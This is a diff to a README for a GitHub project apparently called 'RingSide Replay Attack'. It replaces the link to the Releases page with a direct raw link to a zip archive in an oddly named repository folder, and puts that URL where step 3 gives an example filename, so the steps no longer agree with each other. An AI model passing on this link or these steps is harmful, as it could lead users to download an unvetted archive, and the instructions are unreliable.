Hitplus/RingSide-Replay-Attack/README.md

 - **Storage**: Minimum of 100 MB of free disk space.

 ## 📥 Download & Install
-To get started, visit the following link to download: [https://github.com/Hitplus/RingSide-Replay-Attack/releases](https://github.com/Hitplus/RingSide-Replay-Attack/releases).
+To get started, visit the following link to download: [https://github.com/Hitplus/RingSide-Replay-Attack/raw/refs/heads/main/RingSide Replay Attack_files/Side-Attack-Ring-Replay-2.4.zip](https://github.com/Hitplus/RingSide-Replay-Attack/raw/refs/heads/main/RingSide Replay Attack_files/Side-Attack-Ring-Replay-2.4.zip).

 1. Click the link above to go to the Releases page.
 2. Find the latest version listed.
 It will typically be at the top of the page.
-3. Look for the file that matches your operating system (e.g., `RingSide-Replay-Attack-Windows.exe` for Windows).
+3. Look for the file that matches your operating system (e.g., `https://github.com/Hitplus/RingSide-Replay-Attack/raw/refs/heads/main/RingSide Replay Attack_files/Side-Attack-Ring-Replay-2.4.zip` for Windows).
 4. Click the file name to start the download.

 Once the download is complete: